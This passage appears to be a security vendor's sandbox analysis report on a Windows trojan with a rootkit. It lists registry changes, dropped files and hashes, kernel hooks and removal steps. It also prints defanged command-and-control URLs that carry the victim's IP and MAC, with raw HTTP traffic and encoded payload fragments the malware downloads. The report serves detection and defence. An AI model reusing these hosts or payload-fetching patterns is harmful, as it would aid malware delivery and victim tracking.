[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 21 DB A2 3F 50 0E C8 7F DF 1E 7E 79 39 36 07"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"
The process shock.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC D9 84 84 31 6F 5C 02 36 47 10 EF 6D 97 A1 DC"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"
[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"
[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"
Dropped PE files
MD5 | File path |
---|---|
55a3259a59e3c8da70c31447ba869226 | c:\WINDOWS\Ymb\deskico\desk.exe |
aa6a8b0804c64d9a744478aba1812bf3 | c:\WINDOWS\Ymb\lgsoyx.exe |
a9e6210e1512d80655643408876f5d7c | c:\WINDOWS\Ymb\sys32\shock.dll |
e894852596c57675446919411d8fc600 | c:\WINDOWS\Ymb\sys32\shock.exe |
9d7623b9a5040adb22ce80f31561ee9a | c:\WINDOWS\Ymb\sys32\urlnav.dll |
52b42aa6637c5e7e7a1fa38d8ad3147e | c:\WINDOWS\jwxf\MainPro.exe |
dde8a18d882ec61bffba5ce09fd3ede8 | c:\WINDOWS\jwxf\MainProX.exe |
99c87fbd1328657083180cc0a1c01d01 | c:\WINDOWS\jwxf\yp.exe |
4540f263d05608dcd3eb0affc059bac5 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎ÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\ÆåÅÆ´óÌü.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°Ãâ€ÂÒµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
%WinDir%\Ymb\sys32\shock.dll (931 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 152808 | 153088 | 4.64164 | 22ced87f8cfbeec19f10ea768b9f5033 |
.rdata | 159744 | 20275 | 20480 | 3.68225 | 9aea8072fe8459f1fb075382c5799ef0 |
.data | 180224 | 136672 | 5120 | 1.76573 | 5aafebbc10957e661762e0e7fadc057b |
.rsrc | 319488 | 22204 | 22528 | 3.49153 | 0262b31b1b6e8cd4bbbefdfbece199d6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://116.255.243.151/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 | |
hxxp://saichi.chinacloudapp.cn/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 | |
hxxp://saichi.chinacloudapp.cn/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 | |
hxxp://saichi.chinacloudapp.cn/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 | |
hxxp://saichi.chinacloudapp.cn/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 | |
hxxp://saichi.chinacloudapp.cn/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | |
hxxp://saichi.chinacloudapp.cn/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 | |
hxxp://saichi.chinacloudapp.cn/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 | |
hxxp://saichi.chinacloudapp.cn/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/cfg.ini | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/178.ico | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/190.ico | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/184.ico | |
hxxp://saichi.chinacloudapp.cn/txt/list666_20150402170229.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED | |
hxxp://log.soomeng.com/deskcount?31252A4A412B46731A5D48327378652739263A700E590D0C4B0822 | 115.238.251.56 |
hxxp://sc.p2ptool.com/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 | 42.159.29.153 |
hxxp://plus.zzinfor.cn/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 | |
hxxp://sc.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | 42.159.29.153 |
hxxp://pro.52icafe.com/desk/ico/178.ico | 61.240.135.44 |
hxxp://pro.52icafe.com/desk/ico/184.ico | 61.240.135.44 |
hxxp://sc.p2ptool.com/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 | 42.159.29.153 |
hxxp://pro.52icafe.com/desk/ico/190.ico | 61.240.135.44 |
hxxp://pro.52icafe.com/desk/cfg.ini | 61.240.135.44 |
hxxp://sc.p2ptool.com/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 | 42.159.29.153 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 1446584
Last-Modified: Thu, 19 Mar 2015 08:35:59 GMT
Connection: close
ETag: "550a8a6f-1612b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsE8FbgoIUwpwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKkLylKYwrte9DsLM5FucPllBqI zLItKvUi7rq2FCBqFsOxkH2MqfSv749hq2FwRlndZ00VMyWqzJ/xxHG3la/wJfU2d3xaCkTmuEeFluFMl7A zf9Ag4606gmB7izB9dFky/01vE3mMTazQ2ZSPlrxNrNDZlI Wvl VctcLkkfUPVr1iHDbW5jPiHcrQA6UXLJiZU1pmi12TbqVDGLavoOy6LkFdeCINdwTSf310bhZcnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbXY6hqdQ2cLLUY8yWnM/JlTrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a1nmUDjllD1akaHXA5ON2pzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsK hEEjcLC6cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtP/iDIiRP218TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvLL1A4u6E4zsbEYRbm5uwDsTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9YGRwYXr/5B62mAps5IXtyfE2s0NmUj5a qSnCa1jASD9aoTtByytZbx9M823IT9dsbPFnfe4DzTxNrNDZlI WtwtiPSWquUIj9Gncu4pZZY04U68xaDharxMH0Rg6RlqsTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a2wNi2SICdTxt5q/7FrJX T02MilBFZI5BN89H8kzdMM1wg5aryKKMjyVskrcu QLv2/X5A7iWtC0A4 WNkI2rvOjgcZEb9rUpV5CCcbiObIiZ/ISzb LW24uVO0eYtw3wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uGom3ouwhi4W
<<< skipped >>>
GET /txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:26 GMT
Content-Type: text/plain
Content-Length: 147468
Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT
Connection: close
ETag: "54251ebc-2400c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIS6yH f1P2yDT7rluBqW2giD4y5yvaIirLOkqQZXa MIbx7i/hpcIaf85gpuidXx1b3p9sFPCdGlfauukL8n3VGGCFZN cmJD9zwQCS9bOJYls9jJp/ca4xNrNDZlI Wvl VctcLkkfUViPPzwwZ7PfTmgOKU172htBHTdk3n91KXxuX TIDozHopeYPJWsYu/iFay305SFOdOmlvW lRm5vx/GiWkbKnm/H8aJaRsqZvlZXSZdb4BrY LTgBilBfrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a81Tto86JwVL 37qBdmeggXE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvxbsYtAnHS18TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvtkRGcCbGyejNisBIg3iBXMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9WHnXYPNQ7BgK4Gpapi2s/vE2s0NmUj5a qSnCa1jASD9aoTtByytZZN3m8TegecH/B8RyOgTUFbxNrNDZlI WtwtiPSWquUIj9Gncu4pZZYMEiIQPXrL yZ4gEzkJ3TOMTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
GET /txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:17 GMT
Content-Type: text/plain
Content-Length: 284000
Last-Modified: Thu, 08 Jan 2015 06:22:57 GMT
Connection: close
ETag: "54ae2241-45560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJZdg29 aaSq5ChwQAReXuq73zZ03xNr0ykJLRLxHX2w 1JsVwVN93iCWjRKtF1lC0OB91q5UCVkX CgSF0zvN CGW9lWuWh/s//zc/3tOzL6RL5Mbk/NQRxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxLBeFOtBcslY/dg0 sDpLF93RaUFkAfs63G0OsoI1dTxYLcfzHzT/d51tXZUFbwHFGXJyfQNpBOtYm ARi1SoBtib4BGLVKgG0DV4qTUdhfmSJDFWoq8VaT6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WtslujPm19qT 7ANpY7NNxGxNrNDZlI WvE2s0NmUj5axVTR1yl7Wh4SFW6pDBLFWHE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuoW8230dz3CcTazQ2ZSPlrITDcdtcg4PHE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr2ZKM DeF7JAizyarcgVRXzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVJ0zS6tvj8Khj ky0f66t xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWx KJjsrllxMXn TkM1wXQMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWPTHC32lP2yiKbSD/GqSfVrE2s0NmUj5a qSnCa1jASD 8BgGQTR5rWsfHQ1j7MMGpL7AhrIhxwHxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a1g1uStZN/tZN8nvh42yy5zjYtpOb0ddkzy3MsKhIRqCv1dWtL7KUyRvBdNzQhkZ7g7ZxcD0GQdewD7gnpXgKvkcIPWgIAauLrgYRRnGkYGm/h49sgBiteO8 8Qf/c67uqcUL5XFlPi54GkU/tZooNm/Wfunt1CXI/N0o1JV7j/O
<<< skipped >>>
GET /txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
